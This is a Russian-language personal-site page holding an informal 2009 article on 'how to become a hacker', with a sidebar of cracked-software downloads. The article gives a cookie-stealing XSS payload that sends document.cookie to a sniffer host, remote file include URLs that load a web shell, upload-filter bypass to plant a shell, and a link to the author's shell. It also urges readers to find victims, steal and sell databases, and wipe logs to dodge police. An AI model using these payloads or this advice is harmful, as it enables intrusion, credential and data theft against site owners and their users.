Главная | Регистрация | Вход Приветствую Вас Гость | RSS
меню сайта
Категории раздела
Че то интересное))) [7]
Овруч [4]
Для вебмастеров [9]
Для музыкантов [9]
Всякая всячина [768]
Новости Овруча [0]
всё про мобилы, секреты и т.д. [2]
Наш опрос


Сколько вам лет???
Всего ответов: 2874
Популярные файлы
  • Скачать бесплатно Adobe Audition скачать (v 2.0) +crack
  • Скачать бесплатно Sony ACID Pro 6.0 + crack + keygen
  • Скачать бесплатно FL studio 8 робочая + русификатор!
  • Sony Sound Forge 9.0e build 441 rus Portable
  • Steinberg Cubase SX v3.0.2.623(full rus)
  • Скачать бесплатно Propellerhead Reason Version 4
  • Скачать бесплатно русификатор для Adobe Audition 2.0
  • Скачать книгу Илюстрированый Учебник Fruity Loops (FL studio 8) бесплатно
  • CUBASE 5
  • Скачать бесплатно Auslogics BoostSpeed 4 + crack + keygen
  • Последние файлы
  • Pillars Of Eternity [v 1.0.5.0567] (2015) PC | Патч
  • Массаж и самомассаж при болях в плечах и руках (2013) DVD5
  • Су Джок. Основные приемы самопомощи
  • Ibiza Del Mar Erotica Vol 2 (2013)
  • Домашнее мороженое - 20 видеорецептов (2013)
  • Приемный покой в 38 томах
  • Как потерять 20 кг и улучшить свое здоровье / Довгань Владимир / 2011
  • Антивирус Avast! Free 2013 v. 8.0.1492.324 (ML/RUS)
  • Электронные устройства для уюта и комфорта
  • Установка кастомных прошивок на андроид (2013) DVDRip
  • Врем жизни сайта
    Облако тегов
    Главная » Статьи » Че то интересное)))

    Как стать хакером?
    Как стать хакером
    Глава №1: С чего начать?

    Прежде чем начнём давай условимся, что я не буду расказывать тебе как проводить инъекции, искать и реализовывать xss и прочую лабуду ( нет, ну конечно некоторые аспекты не повредят юному мозгу), я просто наставлю тебя на путь истинный. Итак, начнём!
    Как выбрать OS? Многие говорят, что хакеры сидят только под UNIX, не верь,большинство авторов этих лживых постов ютят у себя на винте ВЫНЬ. Операционная система должна соответствовать твоим требованиям. Только не надо сейчас бежать в магазин за диском со свежайшим дистрибутивом пингвина( LINUX ) или демона( FreeBSD ) или фуги (OpenBSD ). OS UNIX очень сложна. Конечно нынешние дистрибутивы UNIX похожи на окна, но всё же. Килобайты команд надо держать у себя в голове и постоянно долбить по клавишам, одновременно смотря на чёрный как моя кошка терминал! Тебе это надо? Спорю на что угодно, что за первый день своего пребывания в Unix ты не сможешь подключить интернет! А в винде всё просто! И только истинные ламеры где то услышав громкие лозунги тупо выкрикивают, что Винда самая глючная система в мире, что его заколебали вирусы и ошибки. Нет респекта этим людям, не потому, что они выбирают ЛИНУКС, а потому, что они повторяют эту бессмыслицу. Вот главное отличие хакера, он должен быть уникален по своему, у каждого должна быть своя феня. Кстати у меня очень редко виснет Винда, а последний вирус я не помню когда поймал! В Винде очень много программ. Это отличная среда разработки, хотя некоторые языки зарождались в недрах линукс. В вопросах с безопасностью конечно рулят Никсы. Нет, ну конечно же там есть вирусы, но их очень мало. Почему? Потому, что нету смысла.С правами nobody ты вряд ли, что-нибудь сделаешь.Конечно же есть некоторые способы получения привелегий на тачке, разумеется через дыры в продуктах (нет,не в продуктах питания, а в самой системе и прогах.Кстати в сыре тоже есть дыры, а в бублике вообще огромная дыра, но вряд ли её когда нибудь залатают):).
    Ну а если хочешь убить двух зайцев сразу советую испоьзовать виртуальные машины, н-р: VMWare, virtual PC от M$. Но помни, если погонишься за двумя зайцами сразу получишь люлей от лесника. Поставленная виртуалка будет жутко тормозить даже на нормальной тачке. Кстать Веб Мани под VMWare не пашутЪ ( об этом отдельная статья взятаю у Криса Касперски, о том как WebMoney Keeper Classic выдаёт очень много инфы в сеть, может стать даже трояном с которым ты подписал лицензионое соглашение:)!

    Глава №2:
    Весьма странный вопрос я считаю:" какие языки нужно учить, чтобы стать хакером?". Отвечаю:" какие языки нужно учить чтобы стать хакером я не знаю, но хорошие разумеется перечислю со всеми их возможностями: C,C#,C++ - это супермощная среда разработки под все платформы, эксплойты пишутся чаще на них, ООП это круто.
    (об эксплойтах мы поговорим позже ) , Visual Basic - самый медленный после Java язык, но чаще всего на нём пишуться вирусы, Java - я не уверен, что тебе это надо, Delphi,Pascal - мощная среда для разработки программ, маленьких и быстрых, кто-то говорит, что маленьких программ на Дельфине не бывает тот не прав, сейчас Дельфи единственный конкурирующий с C++,C язык ( хотя мы с тобой знаем, что С++ лучше ), Assembler - О, да, АSM - это тяжёлая артилерия для всего угодно ( сплойтов, программ, вирусов ), Perl - непохой язык, появилось множество уязвимостей в скриптах из-за ошибок разработчиков, PHP - схожий по синтаксису с СИ язык, идеально подходит для многих целей ( Для разработки под ВЕБ) н-р: скрипты, эксплойты, работа с БД, рисование и т.д., SQL - очень нужен в нашей профессии для того чтобы составлять запросы к мускулу для выуживания БД (баз данных) ( учить весь язык замучаешься, лучше почитать парочку статей по основным запросам ). Здесь я не привёл ещё много языков которые устарели или не актуальны ( н-р: JavaScript ну на кой он тебе нужен, чтобы куки выуживать?, Lisp, Ada )!

    Глава №3: Категории атак.
    Идём всё ближе к цели!
    1. XSS - наверное все слышали про Cross Site Scripting ( помоему переводится как "внедрение кодав страницу" ). Что можно поднять с помошью Xss спросишь ты? Поднять можно куки (cookie - печенье).
    Зачем они нужны? С помощью кукисов ты идентифицируешься на сайте, т.е. в них хранится инфа о пользователе для сайта. Куки передаются методами POST and GET. Xss бывают активные, пассивные, полуактивные, нестандартные. В этой главе мы рассмотрим только нестандартные и простые X$$!

    document.images[0].src="http://адрес снифера/s.gif"+document.cookieПростые - это что-то типа этого ""(писать без кавычек)
    Но не всегда присутствует эта уязвимость на сайтах. Есть ещё несколько подводных камней - это фильтрация символов,
    alert(document.cookie)браузер жертвы, интелект админа! Н-р: я однажды нашёл одну xss-ky , вбиваю и
    мне выплёвывают мои куки ( это было в IE 6 ), захожу в Opera 8 нифига не пашет!
    Фильтрация это вообще неприятная вешь, парсеры фильтруют знаки такие как (< >,/,+,|,пробел,$,',",; иногда () ).
    Вот сим-таблица -
    Сим ; / ? : @ = & < > " #
    Код %3b %2f %3f %3a %40 %3d %26 %3c %3e %22 %23
    Сим { } | \ ^ ~ [ ] ` % '
    Код %7b %7d %7c %5c %5e %7e %5b %5d %60 %25 %27

    2. SQL-Injection - самый популярный вид атаки о котором все слышали. Вы спросите почему Скуль- ИНЪЕКЦИЯ.
    Инъекция - это внедрение препарата во что-нибудь, также и здесь, мы внедряем запросы в базу и получаем что хотим. Об инъекциях ты можешЪ почитать в соседней статье. Но вообще БД это лакомый кусок для хакера, в конце концов их можно продать. Очень высоко ценятся банковские базы, базы онлайн обменников. Вы спросите для чего они нужны покупателям - это же элементарно, в них хранятся мэйлы, логины, пароли, адреса, аськи, телефоны, пин-коды.
    Но насчёт паролей обольщаться не стоит, в большинстве случаев они зашифрованы (нет не симкой:).
    3. Google Hack - это поиск уязвимостей через самый крутой поисковик в мире - GOOGLE.COM,RU,KZ:)!
    Подробнее прочитай мою статью про Google Hack!
    4.DDoS - наверное ты не раз мечтал положить сайт неприятеля Васи Пупкина, чтобы тот очнулся только через дней пять.
    ДДоС - это отправка пакетов на сайт ( то есть флужения ). Для организации ДДоС-а у тебя должна быть своя бот-сеть.
    Бот-сеть образуется из компов захваченных тобою и находящихся под твоим надзором - своеобразные зомби.
    Без бот сети, у тебя вряд ли что получится.
    5. Include - способ хороший, но не всегда прёт. Способ банально прост, благоаря ошбкам програмиста у тебя появляется шанс
    залить свой файл на сервант (сервер).
    Вот некоторые примеры - http://la-la.fuck/index.pl?file="http://your_site/shell.php,txt,pl"(ага)
    la-la.ru/lox.pl?open="/index.html,pl,php"
    Хитрости: например хитрые администраторы ставят редиректы ( перенаправление на другую страницу )
    Н-р: http://site1/link.php?u=la-la.ru - вот редирект
    С помощью этого бага можно провернуть и Xss и Include.
    Н-р: http://site1/link.php?u=%0A%0A%3Cscri
    pt%3Ealert(document.cookie)%3C
    http://site1/link.php?u=http://la-la.ru/shell - без указания расширения, а то парсер запалит.

    Ещё есть такой прикол как обход фильтра по расширению. Бывает что на сервер позволяют залить некий файл, картинку, без разницы, но с особым разрешением GIF,JPG и т.д. Бывает, что фильтрации вообще нет:). А если есть? Тогда методы наши будут хитрее. Мы сменим разрешение так "myfile.jpg.php", хотя я сомневаюсь, что данный метод будет работать, потому-что парсеры стали намного умнее. Ты конечно понял, что никаких картинок мы качать не будем, а зальём полноценный веб шелл или ещё какую-нибудь штучку. Шелл лучше брать от ныне закрывшейся или переехавшей ныне команды RST. По крайней мере rst.void.ru больше нету, а жалко, клёвая была группа, а какие эксплойты, загляденье. Но взять очень клёвый шелл можно по адресу с моего сайта scooterstar.narod.ru/shell.txt (расширение txt можно убрать:). Там кроме этого ничего нет, не бойся это не вирус, а если антивирус будет на него ругаться не бойся, вирусов с расширением txt я ещё не видел. Кстати, ты спросишь как шелл запустится на сервере? Отвечаю:" Он написан на языке перл, перл - это интерпритатор ( так вроде:), эксплойт запустится сам, только укажи путь к интерпритатору, н-р: !usr/bin/perl, в Выне адрес и perl.exe.
    7.Бруфорс - брутфорс (от лат. "Грубая сила") это банальный подбор паролей по словарюк различным сервисам, не ко всем.
    Хорошие брутфорсы - это Brutus или THC Hydra for Windows and UNIX.
    8.ICQ Hacking - тебе никогда не хотелось иметь красивый номерок Аськи ( я думаю ты знаешь, что это )?
    Вот мне лично нет. Но тебя я посвящу. У меня было пара шестизнаков, но их потом вернули обратно и владельцам. Ирония судьбы, но это так. Лучший способ получить красивый UIN - это купить его, а что, пусть дорого, но законно. Ладно если у тебя нету лишних маней гляди сюда. Второй лучший способ после купли аськи - это брут асек.
    Третий способ, на многих форумах или сайтах делают конкурсы, победителю - аська. Продвинутый гигант по
    ICQ Hacking это софтина ICQ Tools! Точно не знаю где её взять, но точно помню, что с её помощью я заполучил свой первый шестизнак.
    Другой, более грубый способ - это взлом Шопов барыгующих UIN-ами с помощью способов приветённых выше или ниже.
    9.Протроянивание, впаривание вирусов - способ ужасно грубый, так что мы его рассматривать не будем.
    Думаю многие из нас ловили вирусы! Мне за компьютер обидно, он ведь по своему тоже живой:) Вот тебе понравится если в твою задницу засунут червяка:) Я уже про BackDoor (тайная лазейка) не говорю:)
    10.Си - нет это не C#, C++(forever),C - это социальная инженерия, способность манипулировать людьми.
    СИ в сети заниматься значительно легче чем в реале. Почему? Глупый вопрос, в интернете жертва не слышит твой голос не видит твоего лица, не знает сколько тебе лет. Разговор по той же Аське значительно легче, чем в реальной жизни, согласись. Например Кевин Митник прекрасно владел СИ и постоянно дурил крупные компании. Ты конечно же наслышан про Митника.
    11.Кидалово - во преки всем матам в мою сторону я считаю, что кидалово тоже вид хаКа. Ведь там задействована СИ и много других аспектов. Сам я не кидала, не подумай чего. Есть падонки которые кидают нормальных людей на очень большие
    деньги, н-р: Джакс, если хочешь глянуть не в списке кидал ли твой партнёр глянь на kidala.info. Обычно конечно кидают лохов, которые в первый раз сели за компьютер.
    12. Взлом мэйла - самый помоему желанный метод для многих новичков. Есть несколько способов вхлома мэйла - это брутфорс (в интернете полно программ для взлома ящиков под разные OS).
    Сейчас мы прошли некоторые аспекты, хотя не все, следовало бы обратиться к вардрайвингу, крэкингу, фрикингу, кардингу, NetWork Hacking, Kernel Hack, разное прикольное западло и ещё много-много всего. Позже я обязательно об этом напишу. Статья ещё не закончилась, так что читай дальше.
    Deface - очень прикольная вешь. С дефейса практически ничего нельзя поднять кроме мести админу сайта.
    В чём суть дефейса? Ты находишь уязвимость в сайте или получаешь доступ к админке и заливаешь на главную страницу картинку или прикольный текст (что хочешь), можно вообще стереть index.html, php,pl.
    Вообще вешь прикольная, только сдесь надо знать либо html либо JavaScript.

    Глава №4: Безопасность.
    Ты думаешь, что за взломы тебе ничего не светит? Ошибаешься, глянь на Митника, МакКиннона.
    Митнику хотели приписать 300 лет тюрьмы, а МакКиннону присваивают 60:)
    Что главное для хакера, правильно - Анонимность в сети.
    Рассмотрим некоторые из них.
    Proxy - крайне небезопасный способ в последнее время. Почему? Да потому, что я на 80% уверен, что ты пользуешься халявными проксиками, а многие из них как извесно находятся под наблюдением правоохранительных органов или мертвы.
    Лучше пользоваться цепочкой прокси, так надёжнее и выгоднее.
    VpN - дороговатое удовольсвие но весьма эффективное. Это сервер почти полностью отданый под твоё распоряжение.
    Анонимайзеры - признаюсь честно, я им не доверяю, очень тормознуто работают, если хочешь попробовать гляди у SpiderWebb-a в личке сайт или в google.ru(forever).
    Некоторые советы: храни файлы и запускай брутфорсы и прочую лабуду на webshell-ах. Н-р: www.freeshell.org - крайне хороший сервис регистрация через telnet, ОСъ NetBSD 4.0, море утилит, срок действия шелла 90 дней.
    Веб шелл это своеобразный VPN, хранилище файлов, безопасный запуск программ и анонимная закачка шеллов.

    Регулярно чисти History и кэш в браузере.
    Чисти логи с помошью утилиты Vanish (под Линукс).
    Установи нормальный firewall and antivirus, хоть ты и начинающий хакер, но тебе не понравится если к тебе червяки полезут. На брандмауэр Винды не обращай внимание, он ничего не умеет, кроме как блокировка, разблокировка программ и игрушек, которые приходится каждый день разблокировывать. (прикольная скороговорка:)

    Глава №5: Литература - очень знойный вопрос для всех. Вы думаете, что прочитав книжку от неизвестного автора - "Как стать хакером" всему научитесь и будете взламывать серверы NASA and FBI. Ещё чего, если бы всё было так, то от их серваков не осталось бы даже пепла:) Помни, что авторы таких книжек зарабатывают на названии. Доказано, что 70% покупателей книжек смотрят на название, а не на содержание текста. Тем самым становится всё выгоднее писателям, которые выбрали этот брэнд. Насчёт языков програмирования безспорно рулят Буки (books - книги). Плюс неплохо бы тебе хорошо освоить винду. Да, я знаю что ты уже познал все окна и тебе это не нужно. Ошибаешься, несмотря на свою простоту, разобраться с Виндой подчас сложновато. Особенно с некоторыми встроенными прогами.
    Разве ты не мечтал написать СВОЙ убийственный вирус или эксплойт под новую Висту. Познай ядро, реестр и ещё туеву хучу модулей, узнай как внедрять код в процессы, ну конечно нужно знать Ассемблер+Visual_Basic+C#,C+модули_ под_них+Библиотеки и т.д. Короче, на начальном этапе тебе нечего забивать голову всякой фигнёй, как например "Библия хакера 2" ( не первая, первая от Криса Касперски обалденная вещь ). Книга была актуальна года четыре назад.
    Читай статьи от авторитетных хакеров Крис Касперски, ЗАРАЗА, Terabyte, Coban2k ( автор Пинча ).
    Так же не забывай почитывать свежие статейки на форуме и bugtrack-rss-лентах hackzone.ru,
    спрашивай совета от мемберов хакзоны, не стесняйся, мы злые только тогда, если поступают тупые вопросы
    н-р: если можно, взломайте тот-то сайт, пожалуйста. Помни друг, что спасибо в карман не положишь, на хлеб не намажешь и пива "Пожалуйста" нет. Но ты же не такой как все ( смотри первую главу ).
    Совет: никогда не читай журнал "Хакер"(почему? Не читай и всё! Это журнал не от истинных хакеров, все статьи там пишутся за деньги, поэтому не могут быть правдивыми или хорошими, единственные кого я уважаю в "Хакере" - это Даня Шеповалов(ныне работающий в журнале про звёзд Bravo), Gorlum - его статьи про С++ меня часто выручали, Крис Касперски - обалденный эксперт знающий очень много про Юникс и Виндовс, знает очень много языков програмирования.).
    Совет 2: Читай истинно хакерские E-zine н-р: xaoc, Defaced, Xakery Ezine, Codepimps, Mazafaka, Infected Voice.
    Не ленись узнавай аськи у мемберов hackzone.ru, только слишком не приставай, а то пустят в игнор.

    Главу Style, Soft я пропущу так как выбирать софт и свой стиль только тебе ( первая глава ).

    Глава №6: Объекты для атаки.
    Так, прочитав эту статью ты наверное будешь думать, что-бы взломать.
    СОВЕТ: Попробуй обратиться к google.ru (глянь в статье GOOGLE Hack) поищи жертв и потренируйся.
    Тырани пару баз. Только не забывай об анонимности, не редко спец службы ставят западню на таких сайтах.

    Кстати, я тебе не объяснил, что такое эксплойт (сплойт) - эксплойт это прога (скрипт), написанный чаще всего на C++(forever),
    помогающая получить доступ на тачку. Разумеется, под отдельные версии ОСИ или Программ отдельные эксплойты, потому что баги латают( придумывают патчи(заплатки) ).

    Ну че испугались??? Ха-ха))) Лучше быть обычным юзером;) Зачем вам этот хакинг???

    Категория: Че то интересное))) | Добавил: ovruch-rulit (07.01.2009)
    Просмотров: 1577 | Рейтинг: 0.0/0 |
    Всего комментариев: 0
    Добавлять комментарии могут только зарегистрированные пользователи.
    [ Регистрация | Вход ]
    Поделись с друзьям
    Форма входа
    Поиск по сайту
    Наша кнопка

    Код кнопки
    Праздники
    Праздники Украины
    Православные праздники
    Статистика



    Онлайн всего: 1
    Гостей: 1
    Пользователей: 0

    Сегодня нас посетили:
    Copyright by ***$eryoga*** © 2024
    Хостинг от uCoz